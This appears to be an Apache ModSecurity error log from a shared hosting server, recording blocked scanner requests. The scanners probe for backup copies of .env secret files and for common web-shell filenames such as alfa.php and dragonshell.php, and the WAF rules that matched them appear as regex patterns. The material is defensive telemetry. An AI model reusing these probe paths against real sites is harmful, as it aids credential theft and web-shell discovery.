[Tue May 26 16:26:37.395828 2026] [security2:error] [pid 795941:tid 796098] [client 208.84.100.238:29808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.bak"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lngAAAKA"]
[Tue May 26 16:26:37.396219 2026] [security2:error] [pid 795941:tid 796113] [client 208.84.100.238:29914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.local.backup"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lnAAAAK8"]
[Tue May 26 16:26:37.396604 2026] [security2:error] [pid 795941:tid 796195] [client 208.84.100.238:29936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.local.orig"] [unique_id "ahV8Ze2GQ_TLE_VHIp2llgAAAQE"]
[Tue May 26 16:26:37.396864 2026] [security2:error] [pid 795941:tid 796164] [client 208.84.100.238:29798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.production.swp"] [unique_id "ahV8Ze2GQ_TLE_VHIp2loQAAAOI"]
[Tue May 26 16:26:37.397037 2026] [security2:error] [pid 795941:tid 796147] [client 208.84.100.238:29934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.local.swp"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lnwAAANE"]
[Tue May 26 16:26:37.397215 2026] [security2:error] [pid 795941:tid 796168] [client 208.84.100.238:29842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env~"] [unique_id "ahV8Ze2GQ_TLE_VHIp2loAAAAOY"]
[Tue May 26 16:26:37.397225 2026] [security2:error] [pid 795941:tid 796112] [client 208.84.100.238:29884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.local.bak"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lmAAAAK4"]
[Tue May 26 16:26:37.398256 2026] [security2:error] [pid 795941:tid 796111] [client 208.84.100.238:29876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.copy"] [unique_id "ahV8Ze2GQ_TLE_VHIp2llwAAAK0"]
[Tue May 26 16:26:37.399242 2026] [security2:error] [pid 795941:tid 796155] [client 208.84.100.238:29810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "chettinadavenue.com"] [uri "/.env.old"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lmwAAANk"]
[Tue May 26 16:26:37.769456 2026] [security2:error] [pid 795941:tid 796198] [client 20.226.60.108:44872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/maint/about.php"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lqwAAAQQ"]
[Tue May 26 16:26:37.769595 2026] [security2:error] [pid 795941:tid 796198] [client 20.226.60.108:44872] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/maint/about.php"] [unique_id "ahV8Ze2GQ_TLE_VHIp2lqwAAAQQ"]
[Tue May 26 16:26:38.181873 2026] [security2:error] [pid 795941:tid 796171] [client 20.226.60.108:50837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/index.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2luAAAAOk"]
[Tue May 26 16:26:38.181962 2026] [security2:error] [pid 795941:tid 796171] [client 20.226.60.108:50837] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/index.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2luAAAAOk"]
[Tue May 26 16:26:38.577769 2026] [security2:error] [pid 795941:tid 796119] [client 20.226.60.108:19204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2lxAAAALU"]
[Tue May 26 16:26:38.577873 2026] [security2:error] [pid 795941:tid 796119] [client 20.226.60.108:19204] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2lxAAAALU"]
[Tue May 26 16:26:38.609562 2026] [security2:error] [pid 795941:tid 796111] [client 66.249.70.141:49842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2lxQAAAK0"]
[Tue May 26 16:26:38.942247 2026] [security2:error] [pid 795941:tid 796079] [client 20.226.60.108:48699] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/\\\\.[a-z0-9]{4}\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "784"] [id "900080"] [msg "PHP Mailer Access Attempt"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/.info.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2l1wAAAI0"]
[Tue May 26 16:26:38.942343 2026] [security2:error] [pid 795941:tid 796079] [client 20.226.60.108:48699] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/.info.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2l1wAAAI0"]
[Tue May 26 16:26:39.053265 2026] [security2:error] [pid 795941:tid 796174] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Zu2GQ_TLE_VHIp2luwAAAOw"]
[Tue May 26 16:26:39.090194 2026] [security2:error] [pid 795941:tid 796081] [client 114.119.133.194:60233] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV8Z-2GQ_TLE_VHIp2l2QAAAI8"], referer: http://haddingtonwines.com/cart?remove_item=5adaacd4531b78ff8b5cedfe3f4d5212
[Tue May 26 16:26:39.318591 2026] [security2:error] [pid 795941:tid 796117] [client 20.226.60.108:24415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/config.php"] [unique_id "ahV8Z-2GQ_TLE_VHIp2l2wAAALM"]
[Tue May 26 16:26:39.318728 2026] [security2:error] [pid 795941:tid 796117] [client 20.226.60.108:24415] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/config.php"] [unique_id "ahV8Z-2GQ_TLE_VHIp2l2wAAALM"]
[Tue May 26 16:26:39.701102 2026] [security2:error] [pid 795941:tid 796142] [client 20.226.60.108:35192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/item.php"] [unique_id "ahV8Z-2GQ_TLE_VHIp2l6wAAAMw"]
[Tue May 26 16:26:39.701215 2026] [security2:error] [pid 795941:tid 796142] [client 20.226.60.108:35192] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/item.php"] [unique_id "ahV8Z-2GQ_TLE_VHIp2l6wAAAMw"]
[Tue May 26 16:26:40.112127 2026] [security2:error] [pid 795941:tid 796145] [client 20.226.60.108:29182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/albin.php"] [unique_id "ahV8aO2GQ_TLE_VHIp2l8QAAAM8"]
[Tue May 26 16:26:40.112288 2026] [security2:error] [pid 795941:tid 796145] [client 20.226.60.108:29182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/albin.php"] [unique_id "ahV8aO2GQ_TLE_VHIp2l8QAAAM8"]
[Tue May 26 16:26:40.546124 2026] [security2:error] [pid 795941:tid 796181] [client 20.226.60.108:2567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV8aO2GQ_TLE_VHIp2mCAAAAPM"]
[Tue May 26 16:26:40.546256 2026] [security2:error] [pid 795941:tid 796181] [client 20.226.60.108:2567] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV8aO2GQ_TLE_VHIp2mCAAAAPM"]
[Tue May 26 16:26:40.928187 2026] [security2:error] [pid 795941:tid 796087] [client 20.226.60.108:50877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/autoload_classmap.php"] [unique_id "ahV8aO2GQ_TLE_VHIp2mGAAAAJU"]
[Tue May 26 16:26:40.928336 2026] [security2:error] [pid 795941:tid 796087] [client 20.226.60.108:50877] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/autoload_classmap.php"] [unique_id "ahV8aO2GQ_TLE_VHIp2mGAAAAJU"]
[Tue May 26 16:26:41.371746 2026] [security2:error] [pid 795941:tid 796122] [client 20.226.60.108:65465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahV8ae2GQ_TLE_VHIp2mIgAAALg"]
[Tue May 26 16:26:41.371848 2026] [security2:error] [pid 795941:tid 796122] [client 20.226.60.108:65465] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahV8ae2GQ_TLE_VHIp2mIgAAALg"]
[Tue May 26 16:26:41.777773 2026] [security2:error] [pid 795941:tid 796148] [client 20.226.60.108:22760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/dragonshell.php"] [unique_id "ahV8ae2GQ_TLE_VHIp2mKwAAANI"]
[Tue May 26 16:26:41.777897 2026] [security2:error] [pid 795941:tid 796148] [client 20.226.60.108:22760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/dragonshell.php"] [unique_id "ahV8ae2GQ_TLE_VHIp2mKwAAANI"]
[Tue May 26 16:26:42.064497 2026] [core:crit] [pid 795941:tid 796139] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:26:42.140570 2026] [security2:error] [pid 795941:tid 796144] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8aO2GQ_TLE_VHIp2mEgAAAM4"]
[Tue May 26 16:26:42.185602 2026] [security2:error] [pid 795941:tid 796072] [client 20.226.60.108:59021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mNwAAAIY"]
[Tue May 26 16:26:42.185713 2026] [security2:error] [pid 795941:tid 796072] [client 20.226.60.108:59021] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mNwAAAIY"]
[Tue May 26 16:26:42.566847 2026] [security2:error] [pid 795941:tid 796198] [client 20.226.60.108:50853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/gg.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mPAAAAQQ"]
[Tue May 26 16:26:42.566967 2026] [security2:error] [pid 795941:tid 796198] [client 20.226.60.108:50853] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/gg.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mPAAAAQQ"]
[Tue May 26 16:26:42.937938 2026] [security2:error] [pid 795941:tid 796098] [client 20.226.60.108:2617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/gifclass.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mRQAAAKA"]
[Tue May 26 16:26:42.938038 2026] [security2:error] [pid 795941:tid 796098] [client 20.226.60.108:2617] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/gifclass.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mRQAAAKA"]
[Tue May 26 16:26:43.492665 2026] [security2:error] [pid 795941:tid 796082] [client 20.226.60.108:22721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sql.php"] [unique_id "ahV8a-2GQ_TLE_VHIp2mVQAAAJA"]
[Tue May 26 16:26:43.492833 2026] [security2:error] [pid 795941:tid 796082] [client 20.226.60.108:22721] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sql.php"] [unique_id "ahV8a-2GQ_TLE_VHIp2mVQAAAJA"]
[Tue May 26 16:26:43.776317 2026] [security2:error] [pid 795941:tid 796079] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mPwAAAI0"]
[Tue May 26 16:26:43.895717 2026] [security2:error] [pid 795941:tid 796072] [client 20.226.60.108:22769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/up.php"] [unique_id "ahV8a-2GQ_TLE_VHIp2mYAAAAIY"]
[Tue May 26 16:26:43.895848 2026] [security2:error] [pid 795941:tid 796072] [client 20.226.60.108:22769] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/up.php"] [unique_id "ahV8a-2GQ_TLE_VHIp2mYAAAAIY"]
[Tue May 26 16:26:44.166485 2026] [security2:error] [pid 795941:tid 796119] [client 123.23.27.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8au2GQ_TLE_VHIp2mRgAAALU"]
[Tue May 26 16:26:44.432701 2026] [security2:error] [pid 795941:tid 796194] [client 20.226.60.108:59054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahV8bO2GQ_TLE_VHIp2magAAAQA"]
[Tue May 26 16:26:44.432799 2026] [security2:error] [pid 795941:tid 796194] [client 20.226.60.108:59054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahV8bO2GQ_TLE_VHIp2magAAAQA"]
[Tue May 26 16:26:44.872787 2026] [security2:error] [pid 795941:tid 796083] [client 20.226.60.108:29166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/about.php"] [unique_id "ahV8bO2GQ_TLE_VHIp2mcwAAAJE"]
[Tue May 26 16:26:44.872889 2026] [security2:error] [pid 795941:tid 796083] [client 20.226.60.108:29166] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-admin/about.php"] [unique_id "ahV8bO2GQ_TLE_VHIp2mcwAAAJE"]
[Tue May 26 16:26:45.327110 2026] [security2:error] [pid 795941:tid 796146] [client 20.226.60.108:2601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/function.php"] [unique_id "ahV8be2GQ_TLE_VHIp2mewAAANA"]
[Tue May 26 16:26:45.327241 2026] [security2:error] [pid 795941:tid 796146] [client 20.226.60.108:2601] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/function.php"] [unique_id "ahV8be2GQ_TLE_VHIp2mewAAANA"]
[Tue May 26 16:26:45.738948 2026] [security2:error] [pid 795941:tid 796073] [client 20.226.60.108:65412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV8be2GQ_TLE_VHIp2mgAAAAIc"]
[Tue May 26 16:26:45.739056 2026] [security2:error] [pid 795941:tid 796073] [client 20.226.60.108:65412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV8be2GQ_TLE_VHIp2mgAAAAIc"]
[Tue May 26 16:26:45.992918 2026] [security2:error] [pid 795941:tid 796184] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8bO2GQ_TLE_VHIp2mbwAAAPY"]
[Tue May 26 16:26:46.154136 2026] [security2:error] [pid 795941:tid 796163] [client 20.226.60.108:29144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV8bu2GQ_TLE_VHIp2mhQAAAOE"]
[Tue May 26 16:26:46.154249 2026] [security2:error] [pid 795941:tid 796163] [client 20.226.60.108:29144] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV8bu2GQ_TLE_VHIp2mhQAAAOE"]
